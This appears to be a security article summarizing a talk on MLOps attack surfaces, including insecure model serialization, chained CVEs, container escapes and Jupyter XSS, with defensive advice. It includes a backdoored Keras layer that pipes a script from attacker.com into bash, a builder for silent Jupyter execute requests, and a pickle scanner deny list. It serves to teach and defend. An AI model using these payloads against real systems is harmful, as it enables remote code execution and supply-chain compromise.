From MLOps to MLOops: Exposing the Attack Surface of Machine Learning Platforms
This talk demonstrates how vulnerabilities in MLOps platforms, such as lack of authentication and insecure model serialization, can be chained to achieve remote code execution and container escapes. The research focuses on the attack surface of popular machine learning infrastructure, including model registries, pipelines, and inference servers. The speaker highlights that models themselves are executable code, making them a critical vector for supply chain attacks. The presentation concludes with practical mitigation strategies, including the use of safe model formats and security plugins for development environments.
Why Your MLOps Pipeline Is Just a Remote Code Execution Engine in Disguise
TLDR: Machine learning platforms like MLflow and Seldon Core are being deployed with dangerous defaults that treat model files as executable code. By chaining insecure deserialization, lack of authentication, and container escapes, researchers have demonstrated that compromising a single model registry can lead to full infrastructure takeover. Security teams must treat model files as untrusted binaries and enforce strict isolation for all inference and training workloads.
Machine learning infrastructure is currently in the same state that web application security was in twenty years ago. Developers are rushing to deploy complex MLOps platforms to manage the lifecycle of models, but they are treating these platforms as black boxes that only handle data. The reality is far more dangerous. Models are not just static blobs of weights and biases. In many common formats, they are serialized objects that execute arbitrary code upon deserialization. When you load a model, you are often running a remote payload provided by an attacker.
The Inherent Danger of Model Serialization
The core issue is that many popular machine learning frameworks rely on serialization libraries that were never designed for security. The most notorious offender is Python’s pickle module. When a platform uses pickle or libraries that wrap it, such as jsonpickle (referenced in CVE-2020-22083), the act of loading a model is functionally equivalent to executing a script.
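To make that concrete, here is a minimal, deliberately harmless sketch of how pickle's `__reduce__` hook turns deserialization into code execution. The `eval` call stands in for the `os.system` payload a real attacker would use:

```python
import pickle

class MaliciousModel:
    """A 'model' whose mere deserialization runs attacker-chosen code."""
    def __reduce__(self):
        # pickle calls the returned callable with these args during loads().
        # A real payload would return (os.system, ("curl ... | bash",)).
        return (eval, ("2 + 2",))

payload = pickle.dumps(MaliciousModel())

# The victim only has to *load* the file for the code to run:
result = pickle.loads(payload)  # evaluates "2 + 2" -> 4
```

No vulnerability in the loading application is required; this is pickle working exactly as designed.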
Attackers do not need to find a complex memory corruption bug to gain a foothold. They simply need to craft a malicious model file that, when loaded by a victim’s inference server or a data scientist’s notebook, executes a reverse shell or exfiltrates environment variables. Because these platforms often lack robust authentication, an attacker who gains access to a model registry can replace legitimate models with backdoored versions. The next time a CI/CD pipeline or a production server pulls the "latest" model, the compromise spreads automatically.
Chaining Vulnerabilities for Infrastructure Takeover
The most effective attacks against MLOps platforms do not rely on a single bug. They chain multiple weaknesses to move from a low-privilege access point to full cluster control. A common attack flow starts with a path traversal or arbitrary file read vulnerability that leaks sensitive configuration files or API keys from the underlying host.
Once an attacker has obtained administrative API keys for a platform like Weights & Biases, they can manipulate the model registry. The next step is to upload a malicious model that triggers a container escape. If the inference server runs with excessive privileges, lacks a seccomp profile, or sits on an unpatched kernel (CVE-2022-0185, a heap overflow in the Linux filesystem context API, is a classic example), the attacker can break out of the container and gain access to the host node.
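Whether that last hop succeeds often comes down to the capability set the container runs with. A quick triage sketch, parsing the CapEff line from /proc/self/status; the bit position comes from linux/capability.h, and the sample masks below are the well-known default Docker set versus --privileged:

```python
CAP_SYS_ADMIN = 21  # from linux/capability.h; the classic escape-enabling capability

def effective_caps(status_text: str) -> int:
    """Extract the CapEff bitmask from /proc/<pid>/status content."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    return 0

def looks_escapable(status_text: str) -> bool:
    # CAP_SYS_ADMIN in the effective set usually means the container
    # boundary is one mount or bpf trick away from collapsing.
    return bool(effective_caps(status_text) & (1 << CAP_SYS_ADMIN))

default_docker = "CapEff:\t00000000a80425fb"  # unprivileged Docker default
privileged     = "CapEff:\t0000003fffffffff"  # docker run --privileged
```

Running this from inside a compromised inference pod tells you immediately whether a kernel exploit is even necessary, or whether the container was handed the keys outright.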
Consider this simplified payload structure used to demonstrate code execution within a model:
import os
import tensorflow as tf

class MaliciousLayer(tf.keras.layers.Layer):
    def call(self, x):
        # Fires the first time the layer runs on the victim's infrastructure
        os.system("curl http://attacker.com/shell | bash")
        return x

model = tf.keras.models.Sequential([
    tf.keras.Input(shape=(10,)),   # input shape so the model can be saved
    MaliciousLayer(),
    tf.keras.layers.Dense(10),
])
model.save("backdoored_model.h5")
Once a standard inference server loads this model and runs its first prediction, the call method executes the system command. For a pentester, this means any endpoint that accepts a model file upload is a high-priority target. If you are auditing an MLOps environment, your first step should be to verify whether the platform supports "remote code execution as a feature." Many do, and they often document it as a way to run custom pre-processing logic.
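The example above still requires the victim to have MaliciousLayer importable when the model is loaded. In practice, attackers lean on Keras Lambda layers instead, because Keras serializes the lambda's compiled bytecode (via Python's marshal module) directly into the saved file, so the payload travels with the model. The mechanism can be illustrated with nothing but the standard library; the function below is a benign stand-in for a real payload:

```python
import marshal
import types

# What Keras Lambda serialization boils down to: the function's compiled
# bytecode is marshalled into the model artifact...
def payload():
    return "attacker code ran"

blob = marshal.dumps(payload.__code__)   # this blob is what lands in the .h5 file

# ...and on the victim's side, deserializing the layer rebuilds the function
# from raw bytecode and runs it, no class definition needed:
restored = types.FunctionType(marshal.loads(blob), {})
result = restored()
```

This is why newer Keras versions default to `safe_mode`, which refuses to deserialize marshalled lambdas unless explicitly overridden.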
The Jupyter Notebook Trap
Data scientists frequently use Jupyter Notebooks for interactive model development. These environments are often poorly isolated. A recent vulnerability, CVE-2024-27132, highlighted how insufficient sanitization in MLflow recipes could lead to Cross-Site Scripting (XSS). In the context of a Jupyter environment, XSS is not just a way to steal a session cookie. It is a direct path to Remote Code Execution.
An attacker can inject JavaScript into a notebook output that, when rendered by the browser, uses the Jupyter API to create a new code cell and execute arbitrary Python commands on the server. This effectively turns the data scientist’s browser into an attack vector against the internal network. If you are testing an organization that uses Jupyter for ML, treat the notebook server as a critical internal asset. If you can execute code in a notebook, you have effectively compromised the data scientist’s credentials and their access to the model registry.
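At the protocol level, "create a cell and run it" is just an execute_request message sent over the kernel's websocket channel. A sketch of the message the injected JavaScript would assemble; the field names follow the Jupyter messaging specification, while the specific payload string and silent flags are illustrative:

```python
import json
import uuid

def build_execute_request(code: str) -> str:
    """Assemble a Jupyter 'execute_request' wire message (messaging spec v5.3)."""
    return json.dumps({
        "header": {
            "msg_id": str(uuid.uuid4()),
            "msg_type": "execute_request",
            "version": "5.3",
        },
        "parent_header": {},
        "metadata": {},
        "channel": "shell",
        "content": {
            "code": code,          # runs with the data scientist's privileges
            "silent": True,        # suppresses output in the notebook UI
            "store_history": False,
        },
    })

msg = build_execute_request("__import__('os').system('id')")
```

Because the injected script runs in the victim's authenticated browser session, it inherits their token and can talk to the kernel API without any further credential theft.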
Defensive Strategies for MLOps
Defending these platforms requires a shift in mindset. You cannot rely on the platform’s built-in security features, as many are either non-existent or misconfigured. First, implement strict network segmentation. Inference servers should never have direct access to the internet or to the internal management APIs of the model registry.
Second, move away from dangerous serialization formats. If your team is using pickle or joblib, push for a migration to safer, data-only formats like Safetensors, which store tensors without executing code. If you must keep legacy formats, add a scanning layer: tools like picklescan can flag suspicious opcodes in serialized files before they are loaded into your production environment.
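Even without third-party tooling, a stdlib-only opcode scan catches the most common payloads. A minimal sketch using pickletools; the module deny-list here is illustrative, not exhaustive, and a production scanner should allow-list instead:

```python
import io
import os
import pickle
import pickletools

DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins"}

def find_suspicious_globals(data: bytes) -> list:
    """Walk raw pickle opcodes (without executing them) and report risky imports."""
    hits = []
    strings = []  # recent string constants; STACK_GLOBAL takes its operands from here
    for op, arg, _pos in pickletools.genops(io.BytesIO(data)):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif op.name in ("GLOBAL", "INST") and isinstance(arg, str):
            if arg.split(" ", 1)[0] in DANGEROUS_MODULES:
                hits.append(arg.replace(" ", "."))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            module, name = strings[-2], strings[-1]
            if module in DANGEROUS_MODULES:
                hits.append(f"{module}.{name}")
    return hits

class Backdoored:
    def __reduce__(self):
        return (os.system, ("echo pwned",))  # never executed by dumps()

malicious = pickle.dumps(Backdoored())           # serializing is safe
clean = pickle.dumps({"weights": [0.1, 0.2]})    # a plain data-only blob
suspicious = find_suspicious_globals(malicious)
```

The key property is that pickletools.genops only disassembles the stream; unlike pickle.loads, it never invokes the payload, so scanning is safe to do on untrusted files.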
Finally, if you are using Jupyter, deploy security extensions that sandbox the output of notebook cells, preventing malicious JavaScript from interacting with the DOM and escalating to code execution. MLOps is a high-value target because it sits at the intersection of data, code, and production infrastructure. Treat it with the same level of scrutiny you would apply to a domain controller or a CI/CD build server. The next major supply chain attack will likely originate from a backdoored model, not a compromised dependency.